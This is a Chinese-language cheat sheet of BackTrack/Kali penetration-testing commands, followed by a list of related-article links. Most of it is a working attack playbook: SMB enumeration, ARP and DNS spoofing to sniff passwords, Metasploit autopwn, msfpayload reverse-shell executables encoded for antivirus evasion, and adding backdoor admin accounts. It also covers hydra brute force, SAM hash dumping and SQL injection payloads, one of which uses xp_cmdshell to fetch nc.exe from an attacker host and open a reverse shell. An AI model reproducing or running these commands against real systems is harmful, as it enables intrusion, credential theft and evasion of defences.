whois 域名/ip 查看域名的详细信息。
ping 域名/ip 测试本机到远端主机是否联通。
dig 域名/ip 查看域名解析的详细信息。
host -l 域名 dns服务器 传输zone。
扫描
nmap:
-sS 半开扫描TCP和SYN扫描。
-sT 完全TCP连接扫描。
-sU UDP扫描
-PS syn包探测(防火墙探测)
-PA ack包探测(防火墙探测)
-PN 不ping。
-n 不dns解析。
-A -O和-sV。
-O 操作系统识别。
-sV 服务版本信息(banner)
-p 端口扫描。
-T 设置时间级别(0-5)
-iL 导入扫描结果。
-oG 输出扫描结果。

操作系统识别:
p0f -i eth0 -U -p 开启混杂模式。
xprobe2 ip|域名 检测os。

banner获取:
nc ip port 检测端口是否打开。
telnet ip port 检测端口是否打开。
wget ip 下载主页。
cat index.html | more 显示主页代码。
q 退出。

windows枚举
nmap -sS -p 139,445 ip 扫描windows。
cd /pentest/enumeration/smb-enum
nbtscan -f targetIP 检测netbios。
smbgetserverinfo -i targetIP 扫描name,os,组。
smbdumpusers -i targetIP 列出用户。
smbclient -L //targetIP 列出共享。

使用windows:
net use \ip\ipc$ “” /u:"" 开启空会话。
net view \ip 显示共享信息。
smbclient:
smbclient -L hostName -I targetIP 枚举共享。
smbclient -L hostName/share -U “” 用空用户连接。
smbclient -L hostName -I targetIP -U admin普通用户连接。

rpcclient:
rpcclient targetIP -U “”打开一个空会话。
netshareenum 枚举共享。
enumdomusers 枚举用户。
lsaenumsid 枚举域SID。
queryuser RID 查询用户信息。
createdomuser 创建用户访问。

ARP欺骗:
ettercap:
nano /usr/local/etc/etter.conf配置文件
Sniff > Unified sniffing > Network interface: eth0 > OK 设置抓包的网卡
Hosts > Scan for hosts (do this two times)扫描网段的主机
Hosts > Hosts list 显示主机列表
Select the default gateway > Add to Target 1 添加主机
Select the target > Add to Target 2 添加主机
Mitm > Arp poisoning > Sniff remote connections > OK 设置ARP攻击
Start > Start sniffing 开始攻击
dsniff -i eth0 监听网卡窃听登录用户密码
urlsnarf -i eth0 嗅探http请求
msgsnarf -i eth0 嗅探聊天软件的聊天内容
driftnet -i eth0 网络管理嗅探图片,音频。

dns欺骗:
nano /usr/local/share/ettercap/etter.dns编辑配置文件
Plugins > Manage the plugins > dns_spoof 设置dns欺骗
Mitm > Arp poisoning > Sniff remote connections > OK 设置ARP
Start > Start sniffing 开始攻击

Exploits漏洞利用:
cd /pentest/exploits/exploit-db 进入目录
cat sploitlist.txt | grep -i [exploit] 查询需要的漏洞
cat exploit | grep "#include"检查运行环境
cat sploitlist.txt | grep -i exploit | cut -d " " -f1 | xargs grep sys | cut -d “:” -f1 | sort -u只保留可以在linux下运行的代码

Metasploit:
svn update 升级
./msfweb Web接口127.0.0.1:55555。.
./msfconsole 字符下的Console。
help 帮助
show 显示选项
search 搜索名字
use 使用漏洞
show options 显示选项
set 设置选项
show payloads 显示装置
set PAYLOAD 设置装置
show options 显示选项
set 设置选项
show targets 显示目标(os版本)
set TARGET 设置目标版本
exploit 开始漏洞攻击
sessions -l 列出会话
sessions -i 选择会话
sessions -k 结束会话
z 把会话放到后台
c 结束会话
jobs 列出漏洞运行工作
jobs -K 结束一个漏洞运行工作
show auxiliary 显示辅助模块
use 使用辅助模块
set 设置选项
run 运行模块
scanner/smb/version 扫描系统版本
scanner/mssql/mssql_ping 测试mssql是否在线
scanner/mssql/mssql_login 测试登录(暴力或字典)
Attacker behind firewall: bind shell正向
Target behind firewall: reverse shell反向
Meterpreter衔接不懂dos的可以用这个:
db_import_nessus_nbe 加载nessus的扫描结果
db_import_nmap_xml 加载nmap的扫描结果
自动化攻击流程:
cd /pentest/exploit/framework3
./msfconsole
load db_sqlite3
db_destroy pentest
db_create pentest
db_nmap targetIP
db_hosts
db_services
db_autopwn -t -p -e
字符接口攻击流程:
./msfcli | grep -i
./msfcli S
./msfcli = PAYLOAD= E
做木马后门等:
./msfpayload <variable=value>
S summary and options of payload
C C language
P Perl
y Ruby
R Raw, allows payload to be piped into msfencode and other tools
J JavaScript
X Windows executable
./msfpayload windows/shell/reverse_tcp LHOST=10.1.1.1 C
./msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.1 LPORT=4444 X > evil.exe
编码处理就是做免杀:
./msfencode <variable=value>
./msfpayload linux_ia32_bind LPORT=4444 R | ./msfencode -b ‘\x00’ -l
./msfpayload linux_ia32_bind LPORT=4444 R | ./msfencode -b ‘\x00’ -e PexFnstenvMor -t c

入侵后在windows下添加管理员用户:
hostname 查看主机名
net users 查看用户
net user 用户 密码 /add 添加用户
net localgroup 查看工作组
net localgroup administrators 查看管理员组
net localgroup administrators x /add 将用户加入管理员组

TFTP
cp /pentest/windows-binaries/tools/nc.exe /tmp/传递到tftp上
tftp -i 10.1.1.2 GET nc.exe下载

密码
字典zcat /pentest/password/dictionaries/wordlist.txt.Z > words
cat words | wc -l显示个数(30多万个)
暴力:
hydra -l ftp -P words -v targetIP ftp 攻击ftp。
hydra -l muts -P words -v targetIP pop3 攻击pop3
hydra -P words -v targetIP snmp 攻击snmp
攻击microsof VPN
nmap -p 1723 targetIP
dos2unix words
cat words | thc-pptp-bruter targetIP
WYD:
wget -r www.target.com --accept=pdf 下载pdf文档
wyd.pl -o output.txt www.target.com/
cat output.txt | more
SAM文件(windows下的密码文件):
%SYSTEMROOT%/system32/config
%SYSTEMROOT%/repair
备份windows的hash文件:
./msfcli exploit/windows/dcerpc/ms03_026_dcom RHOST=targetIP PAYLOAD=windows/meterpreter/bind_tcp E
meterpreter > upload -r /tmp/pwdump6 c:\windows\system32\
meterpreter > execute -f cmd -c
meterpreter > interact x
C:\WINDOWS\system32> pwdump \127.0.0.1
john破解密码:
cp hash.txt /pentest/password/john-1.7.2/run/
cd /pentest/password/john-1.7.2/run/
./john hash.txt
彩虹表:
rcrack *.rt -f hash.txt

本地修改密码:
mount
umount /mnt/hda1
modprobe fuse
ntfsmount /dev/hda1 /mnt/hda1
mount
ls -l /mnt/hda1 挂载c盘
bkhive /mnt/sda1/WINDOWS/system32/config/system system.txt
samdump2 /mnt/sda1/WINDOWS/system32/config/sam system.txt > hash.txt 备份sam文件
直接修改sam文件:
chntpw /mnt/sda1/WINDOWS/system32/config/SAM
Blank the password. *
Do you really wish to change it? y
Write hive files? y
unmount /mnt/sda1
reboot

SQL 注入
nmap -sS -p 1521 targetIP 扫描oracle
nmap -sS -p T:1433,U:1434 targetIP 扫描mssql
’ or 1=1–验证旁路
列举表名:
’ having 1=1–
’ group by table having 1=1–
’ group by table, table2 having 1=1–
’ group by table, table2, table3 having 1=1–
列举列类型:
union select sum(column) from table –
union select sum(column2) from table –
添加数据:
’ ; insert into table values(‘value’,‘value2’,‘value3’)–
MSSQL存储程序:
输出数据库中备案信息到一个html文件,您可以查看与一个浏览器。
’ ; exec sp_makewebtask “c:\Inetpub\wwwroot\test.html”, “select * from table” ; – www.target.com/test.html
运行ipconfig在浏览器查看信息。
’ or 1=1; exec master…xp_cmdshell ’ “ipconfig” > c:\Inetpub\wwwroot\test.txt’ ;-- www.target.com/test.txt
上传后门。
’ or 1=1; exec master…xp_cmdshell ’ "tftp -i attackIP GET nc.exe && nc.exe attackIP 53 -e cmd.exe’ ; –
攻击者: nc -lvp 53

Linux kali 工具命令大全相关推荐

  1. Linux(Ubuntu 命令大全)

    Linux(Ubuntu 命令大全) Ubuntu 一. Ubuntu简介 Ubuntu(乌班图)是一个基于Debian的以桌面应用为主的Linux操作系统,据说其名称来自非洲南部祖鲁语或科萨语的&q ...

  2. eoiioe linux下解压命令大全

    http://www.cnblogs.com/eoiioe/archive/2008/09/20/1294681.html eoiioe linux下解压命令大全 .tar 解包:tar xvf Fi ...

  3. linux系统正常停机的命令,Linux系统重启命令大全

    在进行Linux系统操作的时候,如果出现更换硬件.更改系统配置及死机等情况时,就需要对电脑进行重启,而不同的情形重启的方式也不同,即使用的命令不同,接下来是小编为大家收集的Linux系统重启命令大全, ...

  4. linux常用工具命令

    linux常用工具命令 @(LINUX)[linux] linux常用工具命令 一dmidecode 1硬件平台 2内存 3cpu 二1sar 三iostat 1iostat -xk 1 四vmsta ...

  5. linux下解压命令大全

    linux下解压命令大全 .tar 解包:tar xvf FileName.tar 打包:tar cvf FileName.tar DirName (注:tar是打包,不是压缩!) --------- ...

  6. Linux菜鸟入门级命令大全

    Linux菜鸟入门级命令大全 1. man 对你熟悉或不熟悉的命令提供帮助解释 eg:man ls 就可以查看ls相关的用法 注:按q键或者ctrl+c退出,在linux下可以使用ctrl+c终止当前 ...

  7. Linux基础及命令大全(入门级教学基础命令)

    Linux基础及命令大全(入门级教学基础命令) 一.什么是shell,Linux的格式 shell就是Linux系统中运行的一种程序,也是用户和内核之间的翻译官,Bash是Linux系统中默认使用的s ...

  8. linux下mysql命令大全

    linux下mysql命令大全 1.linux下启动mysql的命令: mysqladmin start /ect/init.d/mysql start (前面为mysql的安装路径) 2.linux ...

  9. cmd调取windows组件的dos命令大全和常用网络工具,及Linux系统下命令大全

    前言 windows与liunx系统,有许多相同,但有些不通的地方,通过一下的比较,可以加深记忆.若在windows下,某个组件不工作,或者网络不通,或许cmd调取windows组件的dos命令大全: ...

最新文章

  1. checkbox全选与反选
  2. Android View与GroupView原理以及其子类描述
  3. scikit-learn学习笔记(四)Ridge Regression ( 岭回归 )
  4. 目标检测训练trick超级大礼包—不改模型提升精度,值得拥有
  5. 罗振宇2021跨年演讲1:长大以后有多少责任和烦恼?
  6. 董明珠:10个亿不要了,还想再赌五年 雷军:可以试一下
  7. html 13 背景
  8. 【Java】使用MapReduce程序统计UV数量
  9. 端到端的含义,统计学习、机器学习和深度学习的区别与联系
  10. NetSuite高级打印模板设置
  11. 数据分析最常用的excel函数公式大全
  12. 怎么看rx580是不是470刷的_【BIOS】网上都没有的教程 RX470 RX480 RX570 RX580显卡BIOS刷黑了怎么办?自救方法...
  13. 研究生英语读写译教程下课文译文及课后答案
  14. CAD2018下载、安装步骤!
  15. AutoIt上路03-添加工具栏
  16. Python词云_自定义图片做背景
  17. 用纯CSS3的animation制作雪花飘落、星星闪烁、按钮缩放、图片倾斜
  18. 2021年幼儿园教师招聘:小班梳子画《小草》
  19. 请使用netty框架实现高效稳定的websocket通信
  20. 解题:BZOJ 4808 马

热门文章

  1. MyBatis-Plus中Page类各个参数的具体含义
  2. mysql运动会信息管理系统_基于struts的运动会管理系统
  3. MySQL常用增删改查操作(CRUD)
  4. PhotoZoom Pro2023免费版图形图像放大工具
  5. 【转】CentOS 6.0 图形(图解)安装教程、基本配置、网络配置、软件源配置、安装压缩、语言包...
  6. height clientHeight scrollHeight offsetHeight的大致区别
  7. devops_DevOps:责备的后果
  8. ppt文件里面如何插入页脚
  9. android qq密码,怎么用手机改qq密码
  10. 【HTML+CSS】元素垂直对齐-vertical-algin